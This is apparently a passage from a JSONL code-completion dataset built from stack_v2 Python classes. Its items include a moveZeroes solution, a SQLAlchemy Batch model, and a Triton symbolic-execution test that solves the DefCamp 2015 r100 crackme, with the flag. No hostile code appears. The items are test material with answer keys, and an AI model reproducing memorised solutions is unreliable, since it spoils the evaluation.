size:\n if nums[r] != 0:\n nums[l], nums[r] = (nums[r], nums[l])\n l += 1\n r += 1\n print(nums)\n<|end_body_0|>\n\n<|body_start_1|>\n size, l = (len(nums), 0)\n for i in range(0, size):\n if nums[i] != 0:\n nums[l] = nums[i]\n l += 1\n for i in range(l, size):\n nums[i] = 0\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000228", "length_bytes": 802, "license_type": "no_license", "methods": [{"docstring": "Do not return anything, modify nums in-place instead.", "name": "moveZeroes", "signature": "def moveZeroes(self, nums: List[int]) -> None"}, {"docstring": "Do not return anything, modify nums in-place instead.", "name": "moveZeroes1", "signature": "def moveZeroes1(self, nums: List[int]) -> None"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006116", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def moveZeroes(self, nums: List[int]) -> None: Do not return anything, modify nums in-place instead.\n- def moveZeroes1(self, nums: List[int]) -> None: Do not return anything, modify nums in-place instead.", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def moveZeroes(self, nums: List[int]) -> None: Do not return anything, modify nums in-place instead.\n- def moveZeroes1(self, nums: List[int]) -> None: Do not return anything, modify nums in-place instead.\n\n<|skeleton|>\nclass Solution:\n\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_0|>\n\n def moveZeroes1(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n l, r, size = (0, 0, len(nums))\n while r < size:\n if nums[r] != 0:\n nums[l], nums[r] = (nums[r], nums[l])\n l += 1\n r += 1\n print(nums)\n<|end_body_0|>\n\n<|body_start_1|>\n size, l = (len(nums), 0)\n for i in range(0, size):\n if nums[i] != 0:\n nums[l] = nums[i]\n l += 1\n for i in range(l, size):\n nums[i] = 0\n<|end_body_1|>\n", "revision_id": "d74389704de4ce519a22061191b626b7204d4dbc", "skeleton": "<|skeleton|>\nclass Solution:\n\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_0|>\n\n def moveZeroes1(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n l, r, size = (0, 0, len(nums))\n while r < size:\n if nums[r] != 0:\n nums[l], nums[r] = (nums[r], nums[l])\n l += 1\n r += 1\n print(nums)\n\n def moveZeroes1(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n size, l = (len(nums), 0)\n for i in range(0, size):\n if nums[i] != 0:\n nums[l] = nums[i]\n l += 1\n for i in range(l, size):\n nums[i] = 0\n", "source": "the_stack_v2_python_sparse", "source_path": "01_array/easy_283_moveZeroes.py", "source_repo": "MrLW/algorithm", "split": "test", "star_events_count": 0} {"blob_id": "68ef1223d3022307efa878db16af851897523fd7", "bodies": ["batch = cls(name=name, on_weekdays=on_weekdays, on_weekends=on_weekends, clazz=clazz, target_year=target_year, target_exam=target_exam, type=type, other=other, batch_timings=batch_timings, institute_id=institute_id)\ndb.session.add(batch)\ntry:\n db.session.commit()\nexcept IntegrityError:\n db.session.rollback()\n raise BatchNameAlreadyTaken\nreturn batch", "batch = cls.query.get(id)\nif batch is None:\n raise InvalidBatchId\nreturn batch", "exprs = []\nif days is not None:\n if days == 'weekdays':\n exprs.append(Batch.on_weekdays == True)\n if days == 'weekends':\n exprs.append(Batch.on_weekends == True)\nif type is not None:\n exprs.append(Batch.type == type)\nif target_year is not None:\n exprs.append(Batch.target_year == target_year)\nif target_exam is not None:\n exprs.append(Batch.target_exam == target_exam)\nif institute_id is not None:\n exprs.append(Batch.institute_id == institute_id)\nif include_ids is not None and (isinstance(include_ids, list) or isinstance(include_ids, tuple) or isinstance(include_ids, set)):\n exprs.append(Batch.id.in_(list(include_ids)))\nif branches is not None and (isinstance(branches, list) or isinstance(branches, tuple) or isinstance(branches, set)):\n target_exam_list = []\n engineering_exams = ['1', '2', '3']\n medical_exams = ['4', '5']\n if '1' in branches:\n target_exam_list.extend(engineering_exams)\n if '2' in branches:\n target_exam_list.extend(medical_exams)\n exprs.append(Batch.target_exam.in_(list(target_exam_list)))\nif status is None:\n status = 1\nif status != -1:\n exprs.append(Batch.status == status)\nreturn Batch.query.filter(*exprs).order_by(Batch.created_at.desc()).all()"], "bodies_text": "<|body_start_0|>\n batch = cls(name=name, on_weekdays=on_weekdays, on_weekends=on_weekends, clazz=clazz, target_year=target_year, target_exam=target_exam, type=type, other=other, batch_timings=batch_timings, institute_id=institute_id)\n db.session.add(batch)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n raise BatchNameAlreadyTaken\n return batch\n<|end_body_0|>\n\n<|body_start_1|>\n batch = cls.query.get(id)\n if batch is None:\n raise InvalidBatchId\n return batch\n<|end_body_1|>\n\n<|body_start_2|>\n exprs = []\n if days is not None:\n if days == 'weekdays':\n exprs.append(Batch.on_weekdays == True)\n if days == 'weekends':\n exprs.append(Batch.on_weekends == True)\n if type is not None:\n exprs.append(Batch.type == type)\n if target_year is not None:\n exprs.append(Batch.target_year == target_year)\n if target_exam is not None:\n exprs.append(Batch.target_exam == target_exam)\n if institute_id is not None:\n exprs.append(Batch.institute_id == institute_id)\n if include_ids is not None and (isinstance(include_ids, list) or isinstance(include_ids, tuple) or isinstance(include_ids, set)):\n exprs.append(Batch.id.in_(list(include_ids)))\n if branches is not None and (isinstance(branches, list) or isinstance(branches, tuple) or isinstance(branches, set)):\n target_exam_list = []\n engineering_exams = ['1', '2', '3']\n medical_exams = ['4', '5']\n if '1' in branches:\n target_exam_list.extend(engineering_exams)\n if '2' in branches:\n target_exam_list.extend(medical_exams)\n exprs.append(Batch.target_exam.in_(list(target_exam_list)))\n if status is None:\n status = 1\n if status != -1:\n exprs.append(Batch.status == status)\n return Batch.query.filter(*exprs).order_by(Batch.created_at.desc()).all()\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Batch", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Batch:\n\n def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id):\n \"\"\"Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param target_exam: :param type: :param other: some text about batch :param batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:\"\"\"\n <|body_0|>\n\n def get(cls, id):\n \"\"\"Get a single batch :param id: :return:\"\"\"\n <|body_1|>\n\n def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None):\n \"\"\"Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n batch = cls(name=name, on_weekdays=on_weekdays, on_weekends=on_weekends, clazz=clazz, target_year=target_year, target_exam=target_exam, type=type, other=other, batch_timings=batch_timings, institute_id=institute_id)\n db.session.add(batch)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n raise BatchNameAlreadyTaken\n return batch\n<|end_body_0|>\n\n<|body_start_1|>\n batch = cls.query.get(id)\n if batch is None:\n raise InvalidBatchId\n return batch\n<|end_body_1|>\n\n<|body_start_2|>\n exprs = []\n if days is not None:\n if days == 'weekdays':\n exprs.append(Batch.on_weekdays == True)\n if days == 'weekends':\n exprs.append(Batch.on_weekends == True)\n if type is not None:\n exprs.append(Batch.type == type)\n if target_year is not None:\n exprs.append(Batch.target_year == target_year)\n if target_exam is not None:\n exprs.append(Batch.target_exam == target_exam)\n if institute_id is not None:\n exprs.append(Batch.institute_id == institute_id)\n if include_ids is not None and (isinstance(include_ids, list) or isinstance(include_ids, tuple) or isinstance(include_ids, set)):\n exprs.append(Batch.id.in_(list(include_ids)))\n if branches is not None and (isinstance(branches, list) or isinstance(branches, tuple) or isinstance(branches, set)):\n target_exam_list = []\n engineering_exams = ['1', '2', '3']\n medical_exams = ['4', '5']\n if '1' in branches:\n target_exam_list.extend(engineering_exams)\n if '2' in branches:\n target_exam_list.extend(medical_exams)\n exprs.append(Batch.target_exam.in_(list(target_exam_list)))\n if status is None:\n status = 1\n if status != -1:\n exprs.append(Batch.status == status)\n return Batch.query.filter(*exprs).order_by(Batch.created_at.desc()).all()\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000229", "length_bytes": 4381, "license_type": "no_license", "methods": [{"docstring": "Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param target_exam: :param type: :param other: some text about batch :param batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:", "name": "create", "signature": "def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id)"}, {"docstring": "Get a single batch :param id: :return:", "name": "get", "signature": "def get(cls, id)"}, {"docstring": "Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:", "name": "get_filtered", "signature": "def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006338", "prompt": "Implement the Python class `Batch` described below.\n\nClass description:\nImplement the Batch class.\n\nMethod signatures and docstrings:\n- def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id): Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param target_exam: :param type: :param other: some text about batch :param batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:\n- def get(cls, id): Get a single batch :param id: :return:\n- def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None): Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:", "prompted_full_text": "Implement the Python class `Batch` described below.\n\nClass description:\nImplement the Batch class.\n\nMethod signatures and docstrings:\n- def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id): Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param target_exam: :param type: :param other: some text about batch :param batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:\n- def get(cls, id): Get a single batch :param id: :return:\n- def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None): Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:\n\n<|skeleton|>\nclass Batch:\n\n def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id):\n \"\"\"Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param target_exam: :param type: :param other: some text about batch :param batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:\"\"\"\n <|body_0|>\n\n def get(cls, id):\n \"\"\"Get a single batch :param id: :return:\"\"\"\n <|body_1|>\n\n def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None):\n \"\"\"Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n batch = cls(name=name, on_weekdays=on_weekdays, on_weekends=on_weekends, clazz=clazz, target_year=target_year, target_exam=target_exam, type=type, other=other, batch_timings=batch_timings, institute_id=institute_id)\n db.session.add(batch)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n raise BatchNameAlreadyTaken\n return batch\n<|end_body_0|>\n\n<|body_start_1|>\n batch = cls.query.get(id)\n if batch is None:\n raise InvalidBatchId\n return batch\n<|end_body_1|>\n\n<|body_start_2|>\n exprs = []\n if days is not None:\n if days == 'weekdays':\n exprs.append(Batch.on_weekdays == True)\n if days == 'weekends':\n exprs.append(Batch.on_weekends == True)\n if type is not None:\n exprs.append(Batch.type == type)\n if target_year is not None:\n exprs.append(Batch.target_year == target_year)\n if target_exam is not None:\n exprs.append(Batch.target_exam == target_exam)\n if institute_id is not None:\n exprs.append(Batch.institute_id == institute_id)\n if include_ids is not None and (isinstance(include_ids, list) or isinstance(include_ids, tuple) or isinstance(include_ids, set)):\n exprs.append(Batch.id.in_(list(include_ids)))\n if branches is not None and (isinstance(branches, list) or isinstance(branches, tuple) or isinstance(branches, set)):\n target_exam_list = []\n engineering_exams = ['1', '2', '3']\n medical_exams = ['4', '5']\n if '1' in branches:\n target_exam_list.extend(engineering_exams)\n if '2' in branches:\n target_exam_list.extend(medical_exams)\n exprs.append(Batch.target_exam.in_(list(target_exam_list)))\n if status is None:\n status = 1\n if status != -1:\n exprs.append(Batch.status == status)\n return Batch.query.filter(*exprs).order_by(Batch.created_at.desc()).all()\n<|end_body_2|>\n", "revision_id": "c8af233693cd6a97489a2d73a85646b15220389c", "skeleton": "<|skeleton|>\nclass Batch:\n\n def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id):\n \"\"\"Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param target_exam: :param type: :param other: some text about batch :param batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:\"\"\"\n <|body_0|>\n\n def get(cls, id):\n \"\"\"Get a single batch :param id: :return:\"\"\"\n <|body_1|>\n\n def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None):\n \"\"\"Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Batch:\n def create(cls, name, on_weekdays, on_weekends, clazz, target_year, target_exam, type, other, batch_timings, institute_id):\n \"\"\"Create a new batch :param name: :param on_weekdays: :param on_weekends: :param clazz: :param target_year: :param target_exam: :param type: :param other: some text about batch :param batch_timings: string in the form ``h1:m1-h2:m2`` :param institute_id: :return:\"\"\"\n batch = cls(name=name, on_weekdays=on_weekdays, on_weekends=on_weekends, clazz=clazz, target_year=target_year, target_exam=target_exam, type=type, other=other, batch_timings=batch_timings, institute_id=institute_id)\n db.session.add(batch)\n try:\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n raise BatchNameAlreadyTaken\n return batch\n\n def get(cls, id):\n \"\"\"Get a single batch :param id: :return:\"\"\"\n batch = cls.query.get(id)\n if batch is None:\n raise InvalidBatchId\n return batch\n\n def get_filtered(cls, days=None, type=None, target_year=None, target_exam=None, include_ids=None, institute_id=None, status=None, branches=None):\n \"\"\"Get a list of batches after applying filters :param days: :param type: :param target_year: :param target_exam: :param include_ids: :param institute_id: :param status: :param target_exam_list: :return:\"\"\"\n exprs = []\n if days is not None:\n if days == 'weekdays':\n exprs.append(Batch.on_weekdays == True)\n if days == 'weekends':\n exprs.append(Batch.on_weekends == True)\n if type is not None:\n exprs.append(Batch.type == type)\n if target_year is not None:\n exprs.append(Batch.target_year == target_year)\n if target_exam is not None:\n exprs.append(Batch.target_exam == target_exam)\n if institute_id is not None:\n exprs.append(Batch.institute_id == institute_id)\n if include_ids is not None and (isinstance(include_ids, list) or isinstance(include_ids, tuple) or isinstance(include_ids, set)):\n exprs.append(Batch.id.in_(list(include_ids)))\n if branches is not None and (isinstance(branches, list) or isinstance(branches, tuple) or isinstance(branches, set)):\n target_exam_list = []\n engineering_exams = ['1', '2', '3']\n medical_exams = ['4', '5']\n if '1' in branches:\n target_exam_list.extend(engineering_exams)\n if '2' in branches:\n target_exam_list.extend(medical_exams)\n exprs.append(Batch.target_exam.in_(list(target_exam_list)))\n if status is None:\n status = 1\n if status != -1:\n exprs.append(Batch.status == status)\n return Batch.query.filter(*exprs).order_by(Batch.created_at.desc()).all()\n", "source": "the_stack_v2_python_sparse", "source_path": "exam_app/models/batch.py", "source_repo": "GraphicalDot/testrocketbackend", "split": "test", "star_events_count": 0} {"blob_id": "9fbb26001a4626f2cae63159fd5b981d93e044d6", "bodies": ["astCtxt = self.Triton.getAstContext()\nwhile pc:\n opcode = self.Triton.getConcreteMemoryAreaValue(pc, 16)\n instruction = Instruction()\n instruction.setOpcode(opcode)\n instruction.setAddress(pc)\n self.Triton.processing(instruction)\n self.assertTrue(checkAstIntegrity(instruction))\n if instruction.getAddress() == 4196235:\n rax = self.Triton.getSymbolicRegister(self.Triton.registers.rax)\n eax = astCtxt.extract(31, 0, rax.getAst())\n cstr = astCtxt.land([self.Triton.getPathPredicate(), astCtxt.equal(eax, astCtxt.bv(1, 32))])\n model = self.Triton.getModel(cstr)\n solution = str()\n for k, v in list(sorted(model.items())):\n value = v.getValue()\n solution += chr(value)\n self.Triton.setConcreteVariableValue(self.Triton.getSymbolicVariable(k), value)\n pc = self.Triton.getConcreteRegisterValue(self.Triton.registers.rip)\nreturn solution", "import lief\nbinary = lief.parse(filename)\nphdrs = binary.segments\nfor phdr in phdrs:\n size = phdr.physical_size\n vaddr = phdr.virtual_address\n self.Triton.setConcreteMemoryAreaValue(vaddr, list(phdr.content))", "binary_file = os.path.join(os.path.dirname(__file__), 'misc', 'defcamp-2015-r100.bin')\nself.load_binary(binary_file)\nself.Triton.setConcreteRegisterValue(self.Triton.registers.rbp, 2147483647)\nself.Triton.setConcreteRegisterValue(self.Triton.registers.rsp, 1879048191)\nself.Triton.setConcreteRegisterValue(self.Triton.registers.rdi, 268435456)\nfor index in range(30):\n self.Triton.symbolizeMemory(MemoryAccess(268435456 + index, CPUSIZE.BYTE))\nsolution = self.emulate(4196093)\nself.assertEqual(solution, 'Code_Talkers')"], "bodies_text": "<|body_start_0|>\n astCtxt = self.Triton.getAstContext()\n while pc:\n opcode = self.Triton.getConcreteMemoryAreaValue(pc, 16)\n instruction = Instruction()\n instruction.setOpcode(opcode)\n instruction.setAddress(pc)\n self.Triton.processing(instruction)\n self.assertTrue(checkAstIntegrity(instruction))\n if instruction.getAddress() == 4196235:\n rax = self.Triton.getSymbolicRegister(self.Triton.registers.rax)\n eax = astCtxt.extract(31, 0, rax.getAst())\n cstr = astCtxt.land([self.Triton.getPathPredicate(), astCtxt.equal(eax, astCtxt.bv(1, 32))])\n model = self.Triton.getModel(cstr)\n solution = str()\n for k, v in list(sorted(model.items())):\n value = v.getValue()\n solution += chr(value)\n self.Triton.setConcreteVariableValue(self.Triton.getSymbolicVariable(k), value)\n pc = self.Triton.getConcreteRegisterValue(self.Triton.registers.rip)\n return solution\n<|end_body_0|>\n\n<|body_start_1|>\n import lief\n binary = lief.parse(filename)\n phdrs = binary.segments\n for phdr in phdrs:\n size = phdr.physical_size\n vaddr = phdr.virtual_address\n self.Triton.setConcreteMemoryAreaValue(vaddr, list(phdr.content))\n<|end_body_1|>\n\n<|body_start_2|>\n binary_file = os.path.join(os.path.dirname(__file__), 'misc', 'defcamp-2015-r100.bin')\n self.load_binary(binary_file)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rbp, 2147483647)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rsp, 1879048191)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rdi, 268435456)\n for index in range(30):\n self.Triton.symbolizeMemory(MemoryAccess(268435456 + index, CPUSIZE.BYTE))\n solution = self.emulate(4196093)\n self.assertEqual(solution, 'Code_Talkers')\n<|end_body_2|>\n", "class_docstring": "Test for DefCamp2015 challenge.", "class_name": "DefCamp2015", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DefCamp2015:\n \"\"\"Test for DefCamp2015 challenge.\"\"\"\n\n def emulate(self, pc):\n \"\"\"Emulate every opcode from pc. * Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.\"\"\"\n <|body_0|>\n\n def load_binary(self, filename):\n \"\"\"Load in memory every opcode from an elf program.\"\"\"\n <|body_1|>\n\n def test_defcamp_2015(self):\n \"\"\"Load binary, self.Triton.setup environment and solve challenge with sym eval.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n astCtxt = self.Triton.getAstContext()\n while pc:\n opcode = self.Triton.getConcreteMemoryAreaValue(pc, 16)\n instruction = Instruction()\n instruction.setOpcode(opcode)\n instruction.setAddress(pc)\n self.Triton.processing(instruction)\n self.assertTrue(checkAstIntegrity(instruction))\n if instruction.getAddress() == 4196235:\n rax = self.Triton.getSymbolicRegister(self.Triton.registers.rax)\n eax = astCtxt.extract(31, 0, rax.getAst())\n cstr = astCtxt.land([self.Triton.getPathPredicate(), astCtxt.equal(eax, astCtxt.bv(1, 32))])\n model = self.Triton.getModel(cstr)\n solution = str()\n for k, v in list(sorted(model.items())):\n value = v.getValue()\n solution += chr(value)\n self.Triton.setConcreteVariableValue(self.Triton.getSymbolicVariable(k), value)\n pc = self.Triton.getConcreteRegisterValue(self.Triton.registers.rip)\n return solution\n<|end_body_0|>\n\n<|body_start_1|>\n import lief\n binary = lief.parse(filename)\n phdrs = binary.segments\n for phdr in phdrs:\n size = phdr.physical_size\n vaddr = phdr.virtual_address\n self.Triton.setConcreteMemoryAreaValue(vaddr, list(phdr.content))\n<|end_body_1|>\n\n<|body_start_2|>\n binary_file = os.path.join(os.path.dirname(__file__), 'misc', 'defcamp-2015-r100.bin')\n self.load_binary(binary_file)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rbp, 2147483647)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rsp, 1879048191)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rdi, 268435456)\n for index in range(30):\n self.Triton.symbolizeMemory(MemoryAccess(268435456 + index, CPUSIZE.BYTE))\n solution = self.emulate(4196093)\n self.assertEqual(solution, 'Code_Talkers')\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000230", "length_bytes": 18108, "license_type": "permissive", "methods": [{"docstring": "Emulate every opcode from pc. * Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.", "name": "emulate", "signature": "def emulate(self, pc)"}, {"docstring": "Load in memory every opcode from an elf program.", "name": "load_binary", "signature": "def load_binary(self, filename)"}, {"docstring": "Load binary, self.Triton.setup environment and solve challenge with sym eval.", "name": "test_defcamp_2015", "signature": "def test_defcamp_2015(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000713", "prompt": "Implement the Python class `DefCamp2015` described below.\n\nClass description:\nTest for DefCamp2015 challenge.\n\nMethod signatures and docstrings:\n- def emulate(self, pc): Emulate every opcode from pc. * Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.\n- def load_binary(self, filename): Load in memory every opcode from an elf program.\n- def test_defcamp_2015(self): Load binary, self.Triton.setup environment and solve challenge with sym eval.", "prompted_full_text": "Implement the Python class `DefCamp2015` described below.\n\nClass description:\nTest for DefCamp2015 challenge.\n\nMethod signatures and docstrings:\n- def emulate(self, pc): Emulate every opcode from pc. * Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.\n- def load_binary(self, filename): Load in memory every opcode from an elf program.\n- def test_defcamp_2015(self): Load binary, self.Triton.setup environment and solve challenge with sym eval.\n\n<|skeleton|>\nclass DefCamp2015:\n \"\"\"Test for DefCamp2015 challenge.\"\"\"\n\n def emulate(self, pc):\n \"\"\"Emulate every opcode from pc. * Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.\"\"\"\n <|body_0|>\n\n def load_binary(self, filename):\n \"\"\"Load in memory every opcode from an elf program.\"\"\"\n <|body_1|>\n\n def test_defcamp_2015(self):\n \"\"\"Load binary, self.Triton.setup environment and solve challenge with sym eval.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n astCtxt = self.Triton.getAstContext()\n while pc:\n opcode = self.Triton.getConcreteMemoryAreaValue(pc, 16)\n instruction = Instruction()\n instruction.setOpcode(opcode)\n instruction.setAddress(pc)\n self.Triton.processing(instruction)\n self.assertTrue(checkAstIntegrity(instruction))\n if instruction.getAddress() == 4196235:\n rax = self.Triton.getSymbolicRegister(self.Triton.registers.rax)\n eax = astCtxt.extract(31, 0, rax.getAst())\n cstr = astCtxt.land([self.Triton.getPathPredicate(), astCtxt.equal(eax, astCtxt.bv(1, 32))])\n model = self.Triton.getModel(cstr)\n solution = str()\n for k, v in list(sorted(model.items())):\n value = v.getValue()\n solution += chr(value)\n self.Triton.setConcreteVariableValue(self.Triton.getSymbolicVariable(k), value)\n pc = self.Triton.getConcreteRegisterValue(self.Triton.registers.rip)\n return solution\n<|end_body_0|>\n\n<|body_start_1|>\n import lief\n binary = lief.parse(filename)\n phdrs = binary.segments\n for phdr in phdrs:\n size = phdr.physical_size\n vaddr = phdr.virtual_address\n self.Triton.setConcreteMemoryAreaValue(vaddr, list(phdr.content))\n<|end_body_1|>\n\n<|body_start_2|>\n binary_file = os.path.join(os.path.dirname(__file__), 'misc', 'defcamp-2015-r100.bin')\n self.load_binary(binary_file)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rbp, 2147483647)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rsp, 1879048191)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rdi, 268435456)\n for index in range(30):\n self.Triton.symbolizeMemory(MemoryAccess(268435456 + index, CPUSIZE.BYTE))\n solution = self.emulate(4196093)\n self.assertEqual(solution, 'Code_Talkers')\n<|end_body_2|>\n", "revision_id": "a61651ce331ac53ec09e1d8fef5eab744e98c9de", "skeleton": "<|skeleton|>\nclass DefCamp2015:\n \"\"\"Test for DefCamp2015 challenge.\"\"\"\n\n def emulate(self, pc):\n \"\"\"Emulate every opcode from pc. * Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.\"\"\"\n <|body_0|>\n\n def load_binary(self, filename):\n \"\"\"Load in memory every opcode from an elf program.\"\"\"\n <|body_1|>\n\n def test_defcamp_2015(self):\n \"\"\"Load binary, self.Triton.setup environment and solve challenge with sym eval.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DefCamp2015:\n \"\"\"Test for DefCamp2015 challenge.\"\"\"\n\n def emulate(self, pc):\n \"\"\"Emulate every opcode from pc. * Process instruction until the end and search for constraint resolution on cmp eax, 1 then self.Triton.set the new correct value and keep going.\"\"\"\n astCtxt = self.Triton.getAstContext()\n while pc:\n opcode = self.Triton.getConcreteMemoryAreaValue(pc, 16)\n instruction = Instruction()\n instruction.setOpcode(opcode)\n instruction.setAddress(pc)\n self.Triton.processing(instruction)\n self.assertTrue(checkAstIntegrity(instruction))\n if instruction.getAddress() == 4196235:\n rax = self.Triton.getSymbolicRegister(self.Triton.registers.rax)\n eax = astCtxt.extract(31, 0, rax.getAst())\n cstr = astCtxt.land([self.Triton.getPathPredicate(), astCtxt.equal(eax, astCtxt.bv(1, 32))])\n model = self.Triton.getModel(cstr)\n solution = str()\n for k, v in list(sorted(model.items())):\n value = v.getValue()\n solution += chr(value)\n self.Triton.setConcreteVariableValue(self.Triton.getSymbolicVariable(k), value)\n pc = self.Triton.getConcreteRegisterValue(self.Triton.registers.rip)\n return solution\n\n def load_binary(self, filename):\n \"\"\"Load in memory every opcode from an elf program.\"\"\"\n import lief\n binary = lief.parse(filename)\n phdrs = binary.segments\n for phdr in phdrs:\n size = phdr.physical_size\n vaddr = phdr.virtual_address\n self.Triton.setConcreteMemoryAreaValue(vaddr, list(phdr.content))\n\n def test_defcamp_2015(self):\n \"\"\"Load binary, self.Triton.setup environment and solve challenge with sym eval.\"\"\"\n binary_file = os.path.join(os.path.dirname(__file__), 'misc', 'defcamp-2015-r100.bin')\n self.load_binary(binary_file)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rbp, 2147483647)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rsp, 1879048191)\n self.Triton.setConcreteRegisterValue(self.Triton.registers.rdi, 268435456)\n for index in range(30):\n self.Triton.symbolizeMemory(MemoryAccess(268435456 + index, CPUSIZE.BYTE))\n solution = self.emulate(4196093)\n self.assertEqual(solution, 'Code_Talkers')\n", "source": "the_stack_v2_python_sparse", "source_path": "src/testers/unittests/test_simulation.py", "source_repo": "JonathanSalwan/Triton", "split": "test", "star_events_count": 3163} {"blob_id": "7bcf23c8332392ed97bb3fec7180364952dc0d6f", "bodies": ["def del_element(node):\n \"\"\"\n A -> B -> C -> ...\n :param node: A\n :param val: B.val\n :return: A->C->..\n \"\"\"\n tmp_node = node.next.next\n del node.next\n node.next = tmp_node\n return node\nwhile head and head.val == val:\n head = head.next\nif not head:\n return head\nnode = head\nwhile node:\n if not node.next:\n break\n elif node.next.val == val:\n node = del_element(node)\n else:\n node = node.next\nreturn head", "dump_node = 